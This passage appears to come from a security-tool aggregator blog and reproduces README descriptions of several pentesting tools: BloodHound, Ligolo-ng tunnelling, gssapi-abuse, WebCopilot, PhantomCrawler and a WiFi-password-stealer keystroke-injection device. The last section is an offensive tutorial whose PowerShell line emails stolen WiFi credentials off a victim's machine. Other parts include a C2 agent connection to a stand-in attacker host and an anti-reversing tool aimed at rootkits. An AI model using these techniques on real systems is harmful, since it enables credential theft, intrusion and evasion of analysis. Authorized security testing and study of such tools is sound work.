    -k KEYWORD, --keyword KEYWORD
    Keyword. Can use argument multiple times.
    -kf KEYFILE, --keyfile KEYFILE
    Input file with a single keyword per line.
    -m MUTATIONS, --mutations MUTATIONS
    Mutations. Default: enum_tools/fuzz.txt
    -b BRUTE, --brute BRUTE
    List to brute-force Azure container names. Default: enum_tools/fuzz.txt
    -t THREADS, --threads THREADS
    Threads for HTTP brute-force. Default = 5
    -ns NAMESERVER, --nameserver NAMESERVER
    DNS server to use in brute-force.
    -l LOGFILE, --logfile LOGFILE
    Will APPEND found items to specified file.
    -f FORMAT, --format FORMAT
    Format for log file (text,json,csv - defaults to text)
    --disable-aws Disable Amazon checks.
    --disable-azure Disable Azure checks.
    --disable-gcp Disable Google checks.
    -qs, --quickscan Disable all mutations and second-level scans

    Thanks

    So far, I have borrowed from: - Some of the permutations from GCPBucketBrute



    Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals

    By: Zion3R


    Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


    Pentest Muse Web App

    In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

    Disclaimer

    This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

    Requirements

    • Python 3.12 or later
    • Necessary Python packages as listed in requirements.txt

    Setup

    Standard Setup

    1. Clone the repository:

    git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse

    1. Install the required packages:

    pip install -r requirements.txt

    Alternative Setup (Package Installation)

    Install Pentest Muse as a Python Package:

    pip install .

    Running the Application

    Chat Mode (Default)

    In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

    python run_app.py

    or

    pmuse

    Agent Mode (Experimental)

    You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program with agent model, you can use:

    python run_app.py agent

    or

    pmuse agent

    Selection of Language Models

    Managed APIs

    You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.

    OpenAI API keys

    Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.

    Contact

    For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.



    BloodHound - Six Degrees Of Domain Admin

    By: Zion3R


    BloodHound is a monolithic web application composed of an embedded React frontend with Sigma.js and a Go based REST API backend. It is deployed with a Postgresql application database and a Neo4j graph database, and is fed by the SharpHound and AzureHound data collectors.

    BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.

    BloodHound CE is created and maintained by the BloodHound Enterprise Team. The original BloodHound was created by @_wald0, @CptJesus, and @harmj0y.


    Running BloodHound Community Edition

    The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.

    1. Install Docker Compose and ensure Docker is running. This should be included with the Docker Desktop installation
    2. Run curl -L https://ghst.ly/getbhce | docker compose -f - up
    3. Locate the randomly generated password in the terminal output of Docker Compose
    4. In a browser, navigate to http://localhost:8080/ui/login. Login with a username of admin and the randomly generated password from the logs

    NOTE: going forward, the default docker-compose.yml example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in examples/docker-compose/README.md to configure the host binding for the container.


    Installation Error Handling
    • If you encounter a "failed to get console mode for stdin: The handle is invalid." ensure Docker Desktop (and associated Engine is running). Docker Desktop does not automatically register as a startup entry.

    • If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. Please stop or delete the service to continue.
    # Verify if Docker Engine is Running
    docker info

    # Attempt to stop Neo4j Service if running (on Windows)
    Stop-Service "Neo4j" -ErrorAction SilentlyContinue
    • A successful installation of BloodHound CE would look like the below:

    https://github.com/SpecterOps/BloodHound/assets/12970156/ea9dc042-1866-4ccb-9839-933140cc38b9


    Useful Links

    Contact

    Please check out the Contact page in our wiki for details on how to reach out with questions and suggestions.



    NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes

    By: Zion3R


    NullSection is an Anti-Reversing tool that applies a technique that overwrites the section header with nullbytes.


    Install
    git clone https://github.com/MatheuZSecurity/NullSection
    cd NullSection
    gcc nullsection.c -o nullsection
    ./nullsection

    Advantage

    When running nullsection on any ELF, it could be .ko rootkit, after that if you use Ghidra/IDA to parse ELF functions, nothing will appear no function to parse in the decompiler for example, even if you run readelf -S / path /to/ elf the following message will appear "There are no sections in this file."

    Make good use of the tool!


    Note
    We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.


    Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

    By: Zion3R


    Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


    Features

    • Tun interface (No more SOCKS!)
    • Simple UI with agent selection and network information
    • Easy to use and setup
    • Automatic certificate configuration with Let's Encrypt
    • Performant (Multiplexing)
    • Does not require high privileges
    • Socket listening/binding on the agent
    • Multiple platforms supported for the agent

    How is this different from Ligolo/Chisel/Meterpreter... ?

    Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

    When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

    As an example, for a TCP connection:

    • SYN are translated to connect() on remote
    • SYN-ACK is sent back if connect() succeed
    • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
    • Nothing is sent if timeout

    This allows running tools like nmap without the use of proxychains (simpler and faster).

    Building & Usage

    Precompiled binaries

    Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

    Building Ligolo-ng

    Building ligolo-ng (Go >= 1.20 is required):

    $ go build -o agent cmd/agent/main.go
    $ go build -o proxy cmd/proxy/main.go
    # Build for Windows
    $ GOOS=windows go build -o agent.exe cmd/agent/main.go
    $ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

    Setup Ligolo-ng

    Linux

    When using Linux, you need to create a tun interface on the Proxy Server (C2):

    $ sudo ip tuntap add user [your_username] mode tun ligolo
    $ sudo ip link set ligolo up

    Windows

    You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

    Running Ligolo-ng proxy server

    Start the proxy server on your Command and Control (C2) server (default port 11601):

    $ ./proxy -h # Help options
    $ ./proxy -autocert # Automatically request LetsEncrypt certificates

    TLS Options

    Using Let's Encrypt Autocert

    When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

    Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

    Using your own TLS certificates

    If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

    Automatic self-signed certificates (NOT RECOMMENDED)

    The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

    The -ignore-cert option needs to be used with the agent.

    Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

    Using Ligolo-ng

    Start the agent on your target (victim) computer (no privileges are required!):

    $ ./agent -connect attacker_c2_server.com:11601

    If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

    A session should appear on the proxy server.

    INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

    Use the session command to select the agent.

    ligolo-ng » session 
    ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

    Display the network configuration of the agent using the ifconfig command:

    [Agent : nchatelain@nworkstation] » ifconfig 
    [...]
    ┌─────────────────────────────────────────────┐
    │ Interface 3 │
    ├──────────────┬──────────────────────────────┤
    │ Name │ wlp3s0 │
    │ Hardware MAC │ de:ad:be:ef:ca:fe │
    │ MTU │ 1500 │
    │ Flags │ up|broadcast|multicast │
    │ IPv4 Address │ 192.168.0.30/24 │
    └──────────────┴──────────────────────────────┘

    Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

    Linux:

    $ sudo ip route add 192.168.0.0/24 dev ligolo

    Windows:

    > netsh int ipv4 show interfaces

    Idx Mét MTU État Nom
    --- ---------- ---------- ------------ ---------------------------
    25 5 65535 connected ligolo

    > route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

    Start the tunnel on the proxy:

    [Agent : nchatelain@nworkstation] » start
    [Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation

    You can now access the 192.168.0.0/24 agent network from the proxy server.

    $ nmap 192.168.0.0/24 -v -sV -n
    [...]
    $ rdesktop 192.168.0.123
    [...]

    Agent Binding/Listening

    You can listen to ports on the agent and redirect connections to your control/proxy server.

    In a ligolo session, use the listener_add command.

    The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

    [Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
    INFO[1208] Listener created on remote agent!

    On the proxy:

    $ nc -lvp 4321

    When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

    This is very useful when using reverse tcp/udp payloads.

    You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

    [Agent : nchatelain@nworkstation] » listener_list 
    ┌───────────────────────────────────────────────────────────────────────────────┐
    │ Active listeners │
    ├───┬─────────────────────────┬───── ───────────────────┬────────────────────────┤
    │ # │ AGENT │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
    ├───┼─────────────────────────┼────────────────────────┼────────────────────────& #9508;
    │ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234 │ 127.0.0.1:4321 │
    └───┴─────────────────────────┴────────────────────────┴────────────────────────┘

    [Agent : nchatelain@nworkstation] » listener_stop 0
    INFO[1505] Listener closed.

    Demo

    ligolo-ng_demo.mp4

    Does it require Administrator/root access ?

    On the agent side, no! Everything can be performed without administrative access.

    However, on your relay/proxy server, you need to be able to create a tun interface.

    Supported protocols/packets

    • TCP
    • UDP
    • ICMP (echo requests)

    Performance

    You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

    $ iperf3 -c 10.10.0.1 -p 24483
    Connecting to host 10.10.0.1, port 24483
    [ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
    [ ID] Interval Transfer Bitrate Retr Cwnd
    [ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
    [ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
    [ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
    [ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
    [ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
    [ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
    [ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
    [ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
    [ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
    [ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
    - - - - - - - - - - - - - - - - - - - - - - - - -
    [ ID] Interval Transfer Bitrate Retr
    [ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
    [ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

    Caveats

    Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

    When using nmap, you should use --unprivileged or -PE to avoid false positives.

    Todo

    • Implement other ICMP error messages (this will speed up UDP scans) ;
    • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
    • Add mTLS support.

    Credits

    • Nicolas Chatelain <nicolas -at- chatelain.me>


    Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

    By: Zion3R


    gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

    The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active Directory that offer GSSAPI authentication over SSH.

    The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


    Prerequisites

    gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.

    Windows

    On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt, this can be obtained at the MIT Kerberos Distribution Page. Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf

    Linux

    The libkrb5-dev package needs to be installed prior to installing python requirements

    All

    Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool

    pip install -r requirements.txt

    Enumeration Mode

    The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

    Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.

    Example

    python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
    [=] Found 2 non Windows machines registered within AD
    [!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
    [+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

    DNS Mode

    DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targetting a specific domain controller, e.g. DNS/dc1.victim.local.

    Examples

    Adding a DNS A record for host ahost.ad.ginge.com

    python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
    [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
    [=] Adding A record for target ahost using data 192.168.128.50
    [+] Applied 1 updates successfully

    Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a ., this is important or the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones to A records.

    python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
    [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
    [=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
    [+] Applied 1 updates successfully

    Forward and reverse DNS lookup results after execution

    nslookup ahost.ad.ginge.com
    Server: WIN-AF8KI8E5414.ad.ginge.com
    Address: 192.168.128.1

    Name: ahost.ad.ginge.com
    Address: 192.168.128.50
    nslookup 192.168.128.50
    Server: WIN-AF8KI8E5414.ad.ginge.com
    Address: 192.168.128.1

    Name: ahost.ad.ginge.com
    Address: 192.168.128.50


    WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities

    By: Zion3R


    WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

    The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains then it use gf patterns to filters out xss, lfi, ssrf, sqli, open redirect & rce parameters from that given subdomains, and then it scans for vulnerabilities on the sub domains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Then it'll print out the result of the scan and save all the output in a specified directory.


    Features

    Usage

    g!2m0:~ webcopilot -h
                 
    ──────▄▀▄─────▄▀▄
    ─────▄█░░▀▀▀▀▀░░█▄
    ─▄▄──█░░░░░░░░░░░█──▄▄
    █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
    ██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
    ░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
    ░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
    ░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║ ░░░░██║░░██║░░░██║░░░
    ░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
    ░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝ ░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
    [●] @h4r5h1t.hrs | G!2m0

    Usage:
    webcopilot -d <target>
    webcopilot -d <target> -s
    webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

    Flags:
    -d Add your target [Requried]
    -o To save outputs in folder [Default: domain.com]
    -t Number of threads [Default: 100]
    -b Add your server for BXSS [Default: False]
    -x Exclude out of scope domains [Default: False]
    -s Run only Subdomain Enumeration [Default: False]
    -h Show this help message

    Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
    Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

    Installing WebCopilot

    WebCopilot requires git to install successfully. Run the following command as a root to install webcopilot

    git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

    Tools Used:

    SubFinderSublist3rFindomaingfOpenRedireXdnsxsqlmapgobusterassetfinderhttpxkxssqsreplaceNucleidalfoxanewjqaquatoneurldedupeAmassgaupluswaybackurlscrlfuzz

    Running WebCopilot

    To run the tool on a target, just use the following command.

    g!2m0:~ webcopilot -d bugcrowd.com

    The -o command can be used to specify an output dir.

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

    The -s command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

    The -t command can be used to add thrads to your scan for faster result.

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

    The -b command can be used for blind xss (OOB), you can get your server from xsshunter or interact

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

    The -x command can be used to exclude out of scope domains.

    g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

    Example

    Default options looks like this:

    g!2m0:~ webcopilot -d bugcrowd.com - bugcrowd
                                    ──────▄▀▄─────▄▀▄
    ─────▄█░░▀▀▀▀▀░░█▄
    ─▄▄──█░░░░░░░░░░░█──▄▄
    █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
    ██╗░░░░░░░██╗███████╗██████╗░░█████╗░ █████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
    ░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
    ░╚██╗████╗██╔╝█ ███╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
    ░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░ ██║░░░
    ░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
    ░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░ ░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
    [●] @h4r5h1t.hrs | G!2m0


    [❌] Warning: Use with caution. You are responsible for your own actions.
    [❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.


    Target: bugcrowd.com
    Output: /home/gizmo/targets/bugcrowd
    Threads: 100
    Server: False
    Exclude: False
    Mode: Running all Enumeration
    Time: 30-08-2021 15:10:00

    [!] Please wait while scanning...

    [●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
    [●] Subdoamin Scanned - [assetfinder✔] Subdomain Found: 34
    [●] Subdoamin Scanned - [sublist3r✔] Subdomain Found: 29
    [●] Subdoamin Scanned - [subfinder✔] Subdomain Found: 54
    [●] Subdoamin Scanned - [amass✔] Subdomain Found: 43
    [●] Subdoamin Scanned - [findomain✔] Subdomain Found: 27

    [●] Active Subdoamin Scanning is in progress:
    [!] Please be patient. This may take a while...
    [●] Active Subdoamin Scanned - [gobuster✔] Subdomain Found: 11
    [●] Active Subdoamin Scanned - [amass✔] Subdomain Found: 0

    [●] Subdomain Scanning: Filtering out of scope subdomains
    [●] Subdomain Scanning: Filtering Alive subdomains
    [●] Subdomain Scanning: Getting titles of valid subdomains
    [●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/

    [●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30

    [●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
    [●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
    [●] Vulnerabilities Scanned - [XSS✔] Found: 0
    [●] Vulnerabilities Scanned - [SQLi✔] Found: 0
    [●] Vulnerabilities Scanned - [LFI✔] Found: 0
    [●] Vulnerabilities Scanned - [CRLF✔] Found: 0
    [●] Vulnerabilities Scanned - [SSRF✔] Found: 0
    [●] Vulnerabilities Scanned - [Sensitive Data✔] Found: 0
    [●] Vulnerabilities Scanned - [Open redirect✔] Found: 0
    [●] Vulnerabilities Scanned - [Subdomain Takeover✔] Found: 0
    [●] Vulnerabilities Scanned - [Nuclie✔] Found: 0
    [●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/


    ▒█▀▀█ █▀▀ █▀▀ █░░█ █░░ ▀▀█▀▀
    ▒█▄▄▀ █▀▀ ▀▀█ █░░█ █░░ ░░█░░
    ▒█░▒█ ▀▀▀ ▀▀▀ ░▀▀▀ ▀▀▀ ░░▀░░

    [+] Subdomains of bugcrowd.com
    [+] Subdomains Found: 0
    [+] Subdomains Alive: 0
    [+] Endpoints: 11032
    [+] XSS: 0
    [+] SQLi: 0
    [+] Open Redirect: 0
    [+] SSRF: 0
    [+] CRLF: 0
    [+] LFI: 0
    [+] Sensitive Data: 0
    [+] Subdomain Takeover: 0
    [+] Nuclei: 0

    Acknowledgement

    WebCopilot is inspired from Garud & Pinaak by ROX4R.

    Thanks to the authors of the tools & wordlists used in this script.

    @aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R

    Warning: Developers assume no liability and are not responsible for any misuse or damage cause by this tool. So, please se with caution because you are responsible for your own actions.


    PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

    By: Zion3R


    PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

    Features:

    • Utilizes a list of proxy IP addresses from a specified file.
    • Supports both HTTP and HTTPS proxies.
    • Allows users to input the target website URL, proxy file path, and a static port.
    • Makes HTTP requests to the specified website using each proxy.
    • Parses HTML content to extract and visit links on the webpage.

    Usage:

    • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
    • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
    • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
    • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
    • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

    Get New Proxies with port and add in proxies.txt in this format 50.168.163.176:80
    • You can add it from here: https://free-proxy-list.net/ these free proxies are not validated some might not work so first validate these proxies before adding.

    How to Use:

    1. Clone the repository:
    git clone https://github.com/spyboy-productions/PhantomCrawler.git
    1. Install dependencies:
    pip3 install -r requirements.txt
    1. Run the script:
    python3 PhantomCrawler.py

    Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


    Snapshots:

    If you find this GitHub repo useful, please consider giving it a star! 



    WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

    By: Zion3R


    Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

    Disclaimer: All content in this project is intended for security research purpose only.

     

    Introduction

    During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

    Setup

    After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

    Prerequisites

    • Physical access to victim's computer.

    • Unlocked victim's computer.

    • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

    • Knowledge of victim's computer password for the Linux exploit.

    Requirements - What you'll need


    • Raspberry Pi Pico (RPi Pico)
    • Micro USB to USB Cable
    • Jumper Wire (optional)
    • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
    • USB flash drive (for the exploit over physical medium only)


    Note:

    • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

    • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

    • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

    Keystroke injection tool

    Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

    Keystroke injection

    The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

    Delays

    We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

    Exfiltration

    Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

    • Exfiltration over the network medium.
      • This approach was used for the Windows exploit. The whole payload can be seen here.

    • Exfiltration over a physical medium.
      • This approach was used for the Linux exploit. The whole payload can be seen here.

    Windows exploit

    In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

    Sending stolen data over email

    Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

    STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

    Note:

    • After sending data over the email, the .txt file is deleted.

    • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

    • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

    Linux exploit

    In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

    Storing stolen data to USB flash drive

    Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

